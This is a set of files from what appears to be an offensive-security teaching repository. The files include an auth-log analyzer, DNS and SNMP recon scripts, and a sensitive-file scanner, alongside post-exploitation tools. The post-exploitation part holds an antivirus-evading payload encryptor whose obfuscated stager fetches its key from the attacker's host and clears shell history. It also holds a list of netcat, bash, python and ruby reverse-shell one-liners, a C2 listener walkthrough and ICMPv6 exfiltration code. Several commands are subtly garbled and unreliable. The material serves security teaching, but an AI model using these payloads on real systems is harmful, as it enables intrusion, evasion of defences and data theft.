\'{options.user}\'") for log in LOGS[options.user].succ_logs: print("\t", log) # output user-specific failures elif options.fail and options.user: print(f"[+] Failures for user \'{options.user}\'") for fail in LOGS[options.user].fail_logs: print("\t", fail) # output user-specific ip addresses elif options.ip and options.user: print(f"[+] Logged IPs for user \'{options.user}\'") for i in LOGS[options.user].ips: print("\t", i) # print out all information regarding specified user elif options.user is not None: print(f"[!] Logs associated with user \'{options.user}\'") print('[+] First log: ', LOGS[options.user].first_date()) print('[+] Last log: ', LOGS[options.user].last_date()) print("[!] Failure Logs") for fail in LOGS[options.user].fail_logs: print("\t", fail) print("[!] Success Logs") for succ in LOGS[options.user].succ_logs: print("\t", succ) print("[!] Associated IPs") for ip in LOGS[options.user].ips: print("\t", ip) print("[!] Commands") for comm in LOGS[options.user].commands: print("\t", comm) # dump the full log for the user if specified if options.fullu and options.user: print("[!] Full Log") for log in LOGS[options.user].logs: print(log) # if they supplied us with an empty user, dump all of the logged users elif options.user is None: if len(LOGS) > 0: for i in LOGS: print(i)
Python
h4cker/programming_and_scripting_for_cybersecurity/parsing_auth_log/ParseLogs.py
import gzip import re # # ParseLogs.py # Parsing component of Logalyzer. Original: https://github.com/hatRiot/logalyzer # Converted to python3.6 by @programmerchad # # log object # Stuck into a dictionary by user:Log, where log houses # logs, fails, successes, logged IPs, and commands used class Log: # dump date of first log def first_date(self): if len(self.logs) > 0: date = None i = 0 # sometimes the first few aren't right, so look # until we find one while i < len(self.logs) and date is None: date = ParseDate(self.logs[i]) i += 1 return date # dump date of last log def last_date(self): if len(self.logs) > 0: return ParseDate(self.logs[len(self.logs) - 1]) def __init__(self, usr): self.usr = usr self.logs = [] self.fail_logs = [] self.succ_logs = [] self.ips = [] self.commands = [] # parse user from various lines def ParseUsr(line): usr = None if "Accepted password" in line: usr = re.search(r'(\bfor\s)(\w+)', line) elif "sudo:" in line: usr = re.search(r'(sudo:\s+)(\w+)', line) elif "authentication failure" in line: usr = re.search(r'USER=\w+', line) elif "for invalid user" in line: usr = re.search(r'(\buser\s)(\w+)', line) if usr is not None: return usr.group(2) # parse an IP from a line def ParseIP(line): ip = re.search(r'(\bfrom\s)(\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b)', line) if ip is not None: return ip.group(2) # parse a date from the line def ParseDate(line): date = re.search(r'^[A-Za-z]{3}\s*[0-9]{1,2}\s[0-9]{1,2}:[0-9]{2}:[0-9]{2}', line) if date is not None: return date.group(0) # parse a command from a line def ParseCmd(line): # parse command to end of line cmd = re.search(r'(\bCOMMAND=)(.+?$)', line) if cmd is not None: return cmd.group(2) # begin parsing the passed LOG def ParseLogs(log): # initialize the dictionary logs = {} # parse the log f = None try: f = gzip.open(log, 'r') if '.gz' in log else open(log, 'r') log = f.read() except Exception as e: print('[-] Error opening \'%s\': %s' % (log, e)) return None finally: if f is not None: f.close() for line in log.split('\n'): # match a login if "Accepted password for" in line: usr = ParseUsr(line) # add 'em if they don't exist if usr not in logs: logs[usr] = Log(usr) ip = ParseIP(line) # set info if ip not in logs[usr].ips: logs[usr].ips.append(ip) logs[usr].succ_logs.append(line.rstrip('\n')) logs[usr].logs.append(line.rstrip('\n')) # match a failed login elif "Failed password for" in line: # parse user usr = ParseUsr(line) if usr not in logs: logs[usr] = Log(usr) ip = ParseIP(line) if ip not in logs[usr].ips: logs[usr].ips.append(ip) logs[usr].fail_logs.append(line.rstrip('\n')) logs[usr].logs.append(line.rstrip('\n')) # match failed auth elif ":auth): authentication failure;" in line: # so there are three flavors of authfail we care about; # su, sudo, and ssh. Lets parse each. usr = re.search(r'(\blogname=)(\w+)', line) if usr is not None: usr = usr.group(2) # parse a fail log to ssh if "(sshd:auth)" in line: # ssh doesn't have a logname hurr usr = ParseUsr(line) if usr not in logs: logs[usr] = Log(usr) logs[usr].ips.append(ParseIP(line)) # parse sudo/su fails else: if usr not in logs: logs[usr] = Log(usr) logs[usr].fail_logs.append(line.rstrip('\n')) logs[usr].logs.append(line.rstrip('\n')) # match commands elif "sudo:" in line: # parse user usr = ParseUsr(line) if usr not in logs: logs[usr] = Log(usr) cmd = ParseCmd(line) # append the command if it isn't there already if cmd is not None: if cmd not in logs[usr].commands: logs[usr].commands.append(cmd) logs[usr].logs.append(line.rstrip('\n')) return logs
Shell Script
h4cker/programming_and_scripting_for_cybersecurity/post_exploitation/armor.sh
#!/bin/bash # based on the work by @tokyoneon_ # Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. # If LibreSSL isn't found in your system, Armor will attempt to install it. # Variables for colorful terminal output. R="\033[1;31m" Y="\033[1;33m" G="\033[1;32m" N="\033[0;39m" clear # The script name, taken from the input file; first arg. sN="$(echo "$1" | sed 's/.*\///')" # Random 4-digit string appended to the filename to prevent clobbering # previous iterations of the same input file and to avoid enumation attempts # by anyone crawling the attackers server to locate the master key. To increase # the length of the random string, change "2" to "5" or "10". fnRand="$(openssl rand -hex 2)" # The script name and random string are combined to create the filename # for most of the generated files. inFile="$sN"_"$fnRand" # When generating self-signed SSL certificates, a Common Name (domain name) # is required. This value could've been static, but I decided to have # each certificate contain a unique Common Name. Actually, when the master # key is fetched from the attacker's server, the Common Name is ignored. # This is just a formality. cnRand="$(openssl rand -hex 4)" # A random string is inserted into the encoded stager to make the base64 # string appear different every time. This is done to obfuscate the string # and (hopefully) make it less identifiable to antivirus software. junk="$(openssl rand -hex 12)" # The attacker's IP address is converted into a hexidecimal string. There's # no real reason for this, it's easily reverse engineered back an IPv4 # address. Still, in the spirit of overkill obfuscation, this felt appropriate. aH="0x$(printf '%02X' $(echo ${2//./ }))" # The attacker's desired port number. This port number is used by the # target device to fetch the master key and decrypt the payload. Be careful # not to use your Metasploit or Netcat listening port here. aP="$3" # A variable created to identify the working directory. This variable is # used in several functions. dir="$(pwd -P)" # The below three functions are used to print messages in the script. They # use the previously defined color variables to print messages, instructions, # and errors. function msg () { echo -e "$G [+] $N $1" } function msg_instruct () { echo -e "$Y \n [!] $1\n $N" } function msg_fatal () { echo -e "$R \n [ERROR] $1\n $N" exit 0 } # OS detection for below ascii_art function. Base64 "-D" for macOS, "-d" for # Debian/Ubuntu. Other operating systems are untested. function os_detect () { case "$(uname -s)" in Darwin) osDetect='-D' ;; Linux) osDetect='-d' ;; *) msg_fatal "OS detection failed. Comment out the os_detect and ascii_art functions to force continue." ;; esac } os_detect # The "armor" and panther ascii art are encoded; easier than escaping # special characters. Comment out the ascii_art function to suppress the # logo. It's gimmicky, I know. function ascii_art () { echo -e "$R" "$(echo 'CgoKCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLi4sY284b2Mub284ODg4Y2MsLi4KCSAg ICBvOG8uICAgICAgICAgICAgICAgIC4uLG84ODk2ODlvb284ODhvIjg4ODg4ODg4b29vYy4uCgkg IC44ODg4ICAgICAgICAgICAgICAgLm84ODg4Njg4OCIuODg4ODg4ODhvJz84ODg4ODg4ODg4ODlv b28uLi4uCgkgIGE4OFAgICAgICAgICAgICAuLmM2ODg4NjkiIi4uLCJvODg4ODg4ODg4by4/ODg4 ODg4ODg4OCIiLm9vbzg4ODhvby4KCSAgMDg4UCAgICAgICAgIC4uYXRjODg4OSIiLixvbzhvLjg2 ODg4ODg4ODg4byA4ODk4ODg4OSIsbzg4ODg4ODg4ODg4OC4KCSAgODg4dCAgLi4uY29vNjg4ODg5 Iicub29vODhvODhiLic4Njk4ODk4ODg4OSA4Njg4ODg4J284ODg4ODk2OTg5Xjg4OG8KCSAgIDg4 ODg4ODg4ODg4OCIuLm9vbzg4ODk2ODg4ODg4ICAgIjlvNjg4ODg4JyAiODg4OTg4IDg4ODg4Njg4 ODgnbzg4ODg4CiAgICAgICAgICAgIiJHODg4OSIiJ29vbzg4ODg4ODg4ODg4ODg5ICAgLmQ4bzk4 ODkiIicgICAiODY4OG8uIjg4ODg4OTg4Im84ODg4ODhvIC4KCQkgICAgbzg4ODgnIiIiIiIiIiIi JyAgICAgbzg2ODgiICAgICAgICAgIDg4ODY4LiA4ODg4ODguNjg5ODg4ODgibzhvLiAKCQkgICAg ODg4ODhvLiAgICAgICAgICAgICAgIjg4ODhvb28uICAgICAgICAnODg4OC4gODg4ODguODg5ODg4 OG8iODg4by4uCgkgICAgICAgICAgICI4ODg4bCAnICAgICAgICAgICAgICAgIjg4ODg4OCcgICAg ICAgICAgJyIiOG8iODg4OC44ODY5ODg4b284ODg4byAKICAgICAuOy4gICAgICAuOzs7OzssLiAg ICAgLCcgICAgICAgLCwgICAgIC4sOywnICAgICAgOzs7OzssLiAgOi4iODg4OCAiODg4ODg4ODg4 Xjg4bwogICAgIE9NMCAgICAgIHhXbDo6Y29LMC4gIC5XTSwgICAgIDtNVyAgICxLT2xjY3hYZCAg ICdNazo6Y2xrWGMgLi44ODg4LC4gIjg4ODg4ODg4ODg4LgogICAgLldYTS4gICAgIHhXICAgICAg SzAgIC5XTUsgICAgIEtNVyAgIE5rICAgICA7TTogICdNOiAgICAgbE0nOm84ODgubzhvLiAgIjg2 Nm85ODg4bwogICAgbE4uWG8gICAgIHhXICAgICAgT0sgIC5XS1djICAgbFdLVyAgLldkICAgICAu TWwgICdNOiAgICAgO00sOjg4OC5vODg4OC4gICI4OC4iODkiLgogICAgMGsgZFggICAgIHhXICAg ICAgT0sgIC5Xb2RYLiAuTm9kVyAgLldkICAgICAuTWwgICdNOiAgICAgO00sIDg5ICA4ODg4ODgg ICAgIjg4IjouCiAgICdNOyAnTSwgICAgeFcgICAgICBLTyAgLldvLk5vIGRYIGRXICAuV2QgICAg IC5NbCAgJ006ICAgICBvTS4gICAgICc4ODg4bwogICBvTiAgIEt4ICAgIHhXLmNjY29LTy4gIC5X byBjV2xXOiBkVyAgLldkICAgICAuTWwgICdNYztjY2xrWGMgICAgICAgIjg4ODguLgogICBYZCAg IG9OLiAgIHhXIHhXYycuICAgIC5XbyAgS00wICBkVyAgLldkICAgICAuTWwgICdNOixXTycuICAg ICAgICAgIDg4ODg4OG8uCiAgO01jLi4uOk1jICAgeFcgIDBLLiAgICAgLldvICAsVycgIGRXICAu V2QgICAgIC5NbCAgJ006IGNXOiAgICAgICAgICAgICI4ODg4ODksCiAgT1hsbGxsbEtLICAgeFcg IC5LTyAgICAgLldvICAgJyAgIGRXICAuV2QgICAgIC5NbCAgJ006ICBvTicgICAgICAgLiA6IDou Ojo6Oi46IDouCiAuTW8gICAgIGNNLCAgeFcgICAuWGQgICAgLldvICAgICAgIGRXICAuV2QgICAg IC5NbCAgJ006ICAgZFguICAgY3JlYXRlZCBieSBAdG9reW9uZW9uXwogb1cuICAgICAuV2QgIHhX ICAgICdXOiAgIC5XbyAgICAgICBkVyAgIFhPICAgICA6TTsgICdNOiAgICAwTyAgIAogS08gICAg ICAgeE4gIHhXICAgICA6TiwgIC5XbyAgICAgICBkVyAgIC5PMHhvZE8wYyAgICdNOiAgICAuWGsg IAogCgoKCgoKCgoKCgoKCg==' | base64 "$osDetect")"$N"" } ascii_art # The version of OpenSSL found in Debian/Kali isn't compatible with macOS' LibreSSL. # Payloads encrypted in Kali will not be decryptable by the target MacBook. # As a workaround, OpenSSL in Ubuntu was tested and is compatible with LibreSSL # in macOS. Alternatively, allow the armor script to attempt to install LibreSSL. # https://linuxg.net/how-to-install-libressl-2-1-6-on-linux-systems/ # https://github.com/libressl-portable/portable function libressl_install () { if [[ ! -f /usr/bin/make ]]; then msg_fatal "make: command not found. Install with: sudo apt-get install build-essential" fi wget 'https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz' &&\ tar -xzvf libressl-2.8.2.tar.gz libressl-2.8.2/ &&\ cd libressl-2.8.2/ &&\ ./configure &&\ make &&\ sudo make install &&\ sudo ldconfig &&\ if [[ "$(/usr/local/bin/openssl version -v | awk '{print $1}')" = 'LibreSSL' ]]; then msg "It appears LibreSSL was installed successfully." else msg_fatal "Unknown issue while installing LibreSSL." fi } # Verifies LibreSSL compatibility or tries to install it. function openssl_check () { if [[ $(/usr/bin/openssl version -v | awk '{print $1}') = 'LibreSSL' ]]; then opensslPath='/usr/bin/openssl' elif [[ $(/usr/local/bin/openssl version -v | awk '{print $1}') = 'LibreSSL' ]]; then opensslPath='/usr/local/bin/openssl' else msg_instruct "LibreSSL version detection failed. MacOS uses LibreSSL and will not be able to decrypt payloads made in Debian/Kali (e.g., OpenSSL 1.1.0h). Attempt to install LibreSSL? y/N" read libreInstall if [[ "$libreInstall" = 'y' ]]; then libressl_install exit 0 else exit 0 fi fi } # The master key used to encrypt the payload is generated. function mk_key () { "$opensslPath" rand -hex 512 > "$inFile".key &&\ msg "Generated encryption key: "$dir"/"$inFile".key" ||\ msg_fatal "Failed to create the master key." } # The payload is encrypted and encoded. Encrypted to evade antivirus, encoded # to make transporting it easier. function crypt_payload () { "$opensslPath" enc -aes-256-cbc -a -A -in "$1" -pass file:"$inFile".key -out "$inFile".enc &&\ msg "Encrypted payload: "$dir"/"$inFile".enc" ||\ msg_fatal "Failed to encrypt the payload. Check the file path and filename." } # The self-signed SSL certificate for Ncat is generated. Encrypting the # transmission of the master key is important. If DPI is taking place at # the time of the attack, it would be possible for an incident response # team to reconstruct the master key using the raw TCP data. function mk_ssl () { "$opensslPath" req -new -newkey rsa:4096 -x509 -sha256 -days 30 -nodes -subj '/CN='"$cnRand"'' \ -out "$inFile".crt -keyout "$inFile"_ssl.key >/dev/null 2>&1 &&\ msg "Generated SSL certificate: "$dir"/"$inFile".crt" ||\ msg_fatal "Unknown error." msg "Generated SSL key: "$dir"/"$inFile"_ssl.key" } # The suggested stager command is printed. This can be embedded into an # AppleScript or used with a USB Rubber Ducky. The `history -c` command is # appened to the stager to prevent it from being saved to the target's # Terminal history. This, believe it or not, also helps with evading antivirus # software. function mk_stager () { stager=""$junk">/dev/null 2>&1; openssl enc -d -aes-256-cbc \ -in <(printf '%s' '$(cat "$inFile".enc)' | base64 -D) \ -pass file:<(curl -s --insecure https://"$aH":"$aP")" echo -e "bash -c \"\$(bash -c \"\$(printf '%s' '$(printf '%s' "$stager" | base64)' | base64 -D)\")\";history -c" > "$dir"/"$inFile"_stager.txt &&\ msg "Saved stager: "$dir"/"$inFile"_stager.txt" msg_instruct "Execute the below stager in the target MacBook:" cat "$dir"/"$inFile"_stager.txt } # The suggested Ncat listener command is printed. Ncat works well because # the listener automatically terminates after just one established connection. # If the stager is reverse engineered, it would be possible to discover # the attacker's IP address and the location of the master key, but at that # point, the key will no longer be accessible to the internet (or local network). function ncat_listener () { msg_instruct "Start Ncat listener with:" echo -e "$1" } # Attempts to start the Ncat listener for you. function start_ncat () { ncatListener="ncat -v --ssl --ssl-cert $dir/$inFile.crt \ --ssl-key $dir/$inFile\_ssl.key \ -l -p $aP < $dir/$inFile.key" if [[ ! -f /usr/local/bin/ncat ]] && [[ ! -f /usr/bin/ncat ]]; then msg_fatal "Ncat not found. Install Nmap: https://nmap.org/book/install.html" fi msg_instruct "Start the Ncat listener now? y/N " read answer if [[ "$answer" = 'y' ]]; then clear msg "Ncat active for stager: "$inFile"..." eval "$ncatListener" else ncat_listener "$ncatListener" fi } # Some minor input validation. If the input file, attacker's IP address, # and port number are not included, the script exits. if [[ ! $3 ]]; then msg_fatal "Missing args. Use the below command:"$N"\n\n$ ./armor.sh /path/to/payload 192.168.1.2 8080" else # Checks to make sure the input file actually exists. if [[ ! -f "$1" ]]; then msg_fatal "Payload not found. Check file path and filename." fi fi # Executes all of the above functions in order. openssl_check mk_key crypt_payload "$1" mk_ssl mk_stager start_ncat
Markdown
h4cker/programming_and_scripting_for_cybersecurity/post_exploitation/c2_example1.md
# Example of Creating a C2 Using Python Let's create a Python script that sets up a listener to communicate with a remote device. The listener waits for a connection, then allows the user to send commands to the remote device. 🤖 Checkout [this prompt in ChatGPT](https://chat.openai.com/share/a8399b03-9d33-444a-bce3-e7995d351316) Here's a breakdown of the code: 1. **Importing Required Module**: ```python import socket ``` The script imports the `socket` module, which provides a way for Python to interact with network sockets. 2. **Identifier Constant**: ```python IDENTIFIER = "<END_OF_COMMAND_RESULT>" ``` This string serves as an identifier to determine the end of a command result. 3. **Main Script Execution**: The script uses an `if __name__ == "__main__":` block to ensure that the code inside it only runs if the script is executed directly (and not imported as a module). 4. **Setting Up the Socket**: ```python hacker_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ``` A new TCP socket (`SOCK_STREAM`) is created for IPv4 communication (`AF_INET`). 5. **Socket Address Configuration**: ```python IP = "10.6.6.88" Port = 1337 socket_address = (IP, Port) ``` The IP address and port for the listener are defined. 6. **Binding and Listening**: ```python hacker_socket.bind(socket_address) hacker_socket.listen(5) print("listening for incoming connection requests") ``` The socket is bound to the specified IP address and port, and it starts listening for incoming connections with a backlog of 5. 7. **Accepting Connections**: ```python hacker_socket, client_address = hacker_socket.accept() print("connection established with ", client_address) ``` The script waits for a connection. When one is established, it prints the client's address. 8. **Command Loop**: The main loop of the script lets the user input commands to send to the connected device: - If the command is "stop", the socket closes and the script ends. - If the command is empty, the loop continues without sending anything. - If the command starts with "cd", it sends the command and moves to the next iteration. - For other commands, it sends the command and waits for a response. The response is received in chunks and the loop continues until the `IDENTIFIER` is found. 9. **Exception Handling**: If any exception occurs during command execution or communication, the script prints "Exception occurred" and closes the socket.
Markdown
h4cker/programming_and_scripting_for_cybersecurity/post_exploitation/exfil-scapy.md
# Example of Exfiltration over IPv6 Using Scapy Libraries like scapy for Python make it easier for developers to interact with networking abstractions at a higher level. For example, with only two lines of code we are able to send a crafted packet to an IPv6 endpoint: ``` from scapy.all import IPv6,Raw,send send(IPv6(dst="XXXX:XXX:X:1663:7a8a:20ff:fe43:93d4")/Raw(load="sensitive_info")) ``` And sniffing on the other endpoint we can see the packet reaching its destination with the extra raw layer where we included the ‘test’ string: ``` # tcpdump -s0 -l -X -i eth0 'ip6 and not icmp6' tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 23:47:15.996483 IP6 XXXX:XXX:X:1663::1ce > XXXX:XXX:X:1662:7a8a:20ff:fe43:93d4: no next header 0x0000: 6000 0000 0004 3b3e XXXX XXXX XXXX 1663 `.....;>.......c 0x0010: 0000 0000 0000 01ce XXXX XXXX XXXX 1662 ...............b 0x0020: 7a8a 20ff fe43 93d4 7465 7374 0000 z....C..sensitive_info.. ``` Another example: ``` from scapy.all import IPv6,ICMPv6EchoRequest,send import sys secret = "THISISASECRET" # hidden info stored in the packet endpoint = sys.argv[1] # addr where are we sending the data # taken from a random ping6 packet # 0x0030: 1e38 2c5f 0000 0000 4434 0100 0000 0000 .8,_....D4...... # 0x0040: 1011 1213 1415 1617 1819 1a1b 1c1d 1e1f ................ # 0x0050: 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f .!"#$%&'()*+,-./ # 0x0060: 3031 3233 3435 3637 01234567 data = "\x1e\x38\x2c\x5f\x00\x00\x00\x00\x44\x34\x01\x00\x00\x00\x00\x00" \ "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" \ "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f" \ "\x30\x31\x32\x33\x34\x35\x36\x37" def sendpkt(d): if len(d) == 2: seq = (ord(d[0])<<8) + ord(d[1]) else: seq = ord(d) send(IPv6(dst=endpoint)/ICMPv6EchoRequest(id=0x1337,seq=seq, data=data)) # encrypt data with key 0x17 xor = lambda x: ''.join([ chr(ord(c)^0x17) for c in x]) i=0 for b in range(0, len(secret), 2): sendpkt(xor(secret[b:b+2])) ```
Shell Script
h4cker/programming_and_scripting_for_cybersecurity/post_exploitation/letmeout.sh
#!/bin/bash # A quick script to test exfil ports. # Using @mubix letmeoutofyour.net site (https://gitlab.com/mubix/letmeoutofyour.net) # Author: Omar Santos @santosomar for i in $(eval echo {$1..$2}) do echo "Is port $i open for potential exfil?" curl http://letmeoutofyour.net:$i done
Markdown
h4cker/programming_and_scripting_for_cybersecurity/post_exploitation/reverse_shells.md
# Reverse Shell Commands The following are some useful commands to start listeners and reverse shells in Linux and Windows-based systems. ## Netcat Linux Reverse Shell `nc 10.10.10.10 888 -e /bin/sh` * 10.10.10.10 is the IP address of the machine you want the victim to connect to. * 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it). ## Netcat Linux Reverse Shell `nc 10.10.10.10 888 -e cmd.exe` * 10.10.10.10 is the IP address of the machine you want the victim to connect to. * 888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it). ## Using Bash `bash -i & /dev/tcp/10.10.10.10/888 0 &1` ## Using Python `python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'` ## Using Ruby `ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'`
Markdown
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/snmp.md
# Useful SNMP Commands # Search for Windows installed software `smpwalk !grep hrSWinstalledName` ## Search for Windows users `snmpwalk ip 1.3 lgrep --.1.2.25 -f4` ## Search for Windows running services `snrnpwalk -c public -v1 ip 1 lgrep hrSWRJnName !cut -d" " -f4` ## Search for Windows open TCP ports `smpwalk lgrep tcpConnState !cut -d" " -f6 !sort -u`
Shell Script
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/dns_recon/dns-recon2.sh
#!/bin/bash # bruteforce subdomains # Use a wordlist of your choice. I am using dnscan's wordlist in this example for domain in $(cat /usr/share/wordlists/amass/fierce_hostlist.txt); do host $domain.h4cker.org; done | grep -v NXDOMAIN | sort -u
Markdown
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/dns_recon/dns_plus_whois.md
# DNS Resolution + WHOIS During a penetration test, it is crucial to verify that the discovered hosts are within the defined scope. In today's landscape, where organizations often leverage cloud services to host their applications, it becomes essential to determine if a subdomain or hostname belongs to an application that is hosted outside of the organization's infrastructure. The following script can be immensely valuable in identifying whether a particular subdomain or hostname is associated with an application hosted in the cloud rather than being hosted internally by the organization. ``` import sys import requests import socket import whois def dns_lookup(domain): try: ip = socket.gethostbyname(domain) print("IP Address: ", ip) return ip except socket.gaierror: print("DNS Lookup Failed") return None def whois_lookup(ip): try: w = whois.whois(ip) print("OrgName: ", w.org) print("Address: ", w.address) print("RegDate: ", w.creation_date) print("NetRange: ", w.range) print("CIDR: ", w.cidr) except Exception as e: print("WHOIS Lookup Failed: ", str(e)) if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python passive_recon.py <domain>") sys.exit(1) domain = sys.argv[1] # Perform DNS Lookup print("Performing DNS Lookup for", domain) ip_address = dns_lookup(domain) if ip_address: # Perform WHOIS Lookup print("\nPerforming WHOIS Lookup for", ip_address) whois_lookup(ip_address) ``` 1. The script imports the necessary libraries and modules, including `sys`, `socket`, and `whois`. 2. The `dns_lookup` function takes a domain as input and performs a DNS lookup using the `socket.gethostbyname` method to obtain the IP address associated with the domain. It then prints the IP address and returns it. 3. The `whois_lookup` function takes an IP address as input and performs a WHOIS lookup using the `whois.whois` method. It retrieves the WHOIS information for the given IP address, including OrgName, Address, RegDate, NetRange, and CIDR. It then prints this information. 4. The `if __name__ == "__main__":` block is the main execution part of the script. 5. It first checks if the command-line argument count is not equal to 2 (indicating that a domain argument is missing). If so, it prints the usage information and exits the script. 6. The script retrieves the domain from the command-line argument. 7. It calls the `dns_lookup` function with the domain to perform the DNS lookup and obtain the IP address associated with the domain. The IP address is stored in the `ip_address` variable. 8. If an IP address is obtained successfully, the script calls the `whois_lookup` function with the IP address to perform the WHOIS lookup. 9. The `whois_lookup` function retrieves the WHOIS information for the IP address and prints the OrgName, Address, RegDate, NetRange, and CIDR information. You can run the script by providing the domain name as a command-line argument, like this: ``` python passive_recon.py secretcorp.org ``` The script performs a DNS lookup to obtain the IP address associated with the domain, and then it performs a WHOIS lookup based on that IP address. At the end, it prints the OrgName, Address, RegDate, NetRange, and CIDR information obtained from the WHOIS lookup. Please note that the effectiveness of the WHOIS lookup depends on the availability and accuracy of the WHOIS information for the given IP address. Then it prints the OrgName, Address, RegDate, NetRange, and CIDR information obtained from the WHOIS lookup.
Markdown
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/dns_recon/dns_recon.md
# DNS Reconnassaince ## DNSRECON * [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator) Reverse lookup for IP range: `./dnsrecon.rb -t rvs -i 10.1.1.1,10.1.1.50` Retrieve standard DNS records: `./dnsrecon.rb -t std -d example.com` Enumerate subdornains: `./dnsrecon.rb -t brt -d example.com -w hosts.txt` DNS zone transfer: `./dnsrecon -d example.com -t axfr` ## Parsing NMAP Reverse DNS Lookup `nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2" "$3)=="NMAP scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' dns.txt `
Shell Script
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/dns_recon/host_DNS_enum.sh
# quick script to get IP addresses from a predefined domain list text file. #create a file called domains.txt and exec the following one-liner script. for url in $(cat domains.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u
Markdown
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/dns_recon/subdomain_finder_in_python.md
# How to Create a Sub-Domain Finder in Python The following is a sample Python script to find subdomains using DNS. This script is using the `dns.resolver` module from the `dnspython` library. If you don't have the library installed, you can install it using pip: ``` pip3 install dnspython ``` The following is the Python script that can be used to find subdomains for a given domain using a provided wordlist file: ``` import dns.resolver import argparse def load_subdomains(file_path): with open(file_path, 'r') as file: subdomains = file.read().splitlines() return subdomains def find_subdomains(domain, subdomains): found_subdomains = [] resolver = dns.resolver.Resolver() for subdomain in subdomains: target = f'{subdomain}.{domain}' try: answers = resolver.resolve(target, 'A') found_subdomains.append((target, [str(answer) for answer in answers])) except dns.resolver.NXDOMAIN: pass except Exception as e: print(f'Error resolving {target}: {e}') return found_subdomains def main(): parser = argparse.ArgumentParser(description='Find subdomains using DNS') parser.add_argument('domain', type=str, help='Domain to search for subdomains') parser.add_argument('wordlist', type=str, help='Path to subdomain wordlist file') args = parser.parse_args() subdomains = load_subdomains(args.wordlist) found_subdomains = find_subdomains(args.domain, ``` - Import necessary libraries: The script imports the dns.resolver module from the dnspython library, as well as the argparse module to handle command-line arguments. - `load_subdomains(file_path)`: This function takes a file path as input and reads the file, splitting the content by lines to get a list of subdomains. It returns the list of subdomains. - `find_subdomains(domain, subdomains)`: This function takes a domain and a list of subdomains as input. It initializes a DNS resolver object and iterates through the subdomains list, attempting to resolve each subdomain by appending it to the domain and performing a DNS lookup for the 'A' record (IPv4 address). If the lookup is successful, the subdomain and its corresponding IP addresses are added to the found_subdomains list. If the lookup fails with a `dns.resolver.NXDOMAIN` exception, the subdomain does not exist, and the script continues to the next subdomain. For other exceptions, an error message is printed. The function returns the `found_subdomains` list containing the successfully resolved subdomains and their IP addresses. - `main()`: This function sets up the command-line argument parser, which expects two arguments: the target domain and the path to the subdomain wordlist file. It then calls `load_subdomains()` to load the subdomains from the wordlist file, and `find_subdomains()` to perform the DNS lookups.
Markdown
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/finding_sensitive_files/README.md
# Sensitive File Scanner This script scans a specified directory for sensitive files based on file extensions and patterns. It is designed to be used on Linux systems. ## Requirements - Python 3.x ## Usage To use the script, follow the steps below: 1. Save the script to a file named `sensitive_file_scanner.py`. 2. Run the script with the directory you want to scan as an argument: ``` python3 sensitive_file_scanner.py /path/to/scan ``` The script will output the paths of any matching sensitive files found in the specified directory and its subdirectories. ## Customization You can customize the list of sensitive file extensions and patterns by modifying the sensitive_extensions and sensitive_patterns lists in the sensitive_file_scanner.py script. Add or remove extensions and patterns based on your specific requirements. ``` sensitive_extensions = ['.key', '.pem', '.pgp', '.p12', '.pfx', '.csv'] sensitive_patterns = ['*password*', '*secret*', '*private*', '*confidential*'] ``` ## Disclaimer This script is provided for educational and informational purposes only. The author (Omar Santos) and future contributors are not responsible for any misuse, damage, or unintended consequences caused by the use of this script. Always ensure you have proper authorization before scanning any system or network.
Python
h4cker/programming_and_scripting_for_cybersecurity/recon_scripts/finding_sensitive_files/sensitive_file_scanner.py
#!/usr/bin/env python3 """ Script Name: sensitive_file_scanner.py Author: Omar Santos Version: 0.1 Description: This script scans a specified directory for sensitive files based on file extensions and patterns. It is designed to be used on Linux systems. The script will output the paths of any matching sensitive files found in the specified directory and its subdirectories. Dependencies/Prerequisites: - Python 3.x - No additional libraries are required. """ import os import sys import fnmatch # List of sensitive file extensions and patterns to search for sensitive_extensions = ['.key', '.pem', '.pgp', '.p12', '.pfx', '.csv'] sensitive_patterns = ['*password*', '*secret*', '*private*', '*confidential*'] # Function to check if the file matches sensitive file patterns def is_sensitive_file(file_name): for pattern in sensitive_patterns: if fnmatch.fnmatch(file_name, pattern): return True _, file_extension = os.path.splitext(file_name) if file_extension in sensitive_extensions: return True return False # Function to scan for sensitive files in the specified directory def scan_directory(directory): for root, _, files in os.walk(directory): for file in files: if is_sensitive_file(file): print(f"Sensitive file found: {os.path.join(root, file)}") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 sensitive_file_scanner.py <directory>") sys.exit(1) search_directory = sys.argv[1] if not os.path.isdir(search_directory): print(f"Error: {search_directory} is not a valid directory") sys.exit(1) print(f"Scanning {search_directory} for sensitive files...") scan_directory(search_directory)
Python
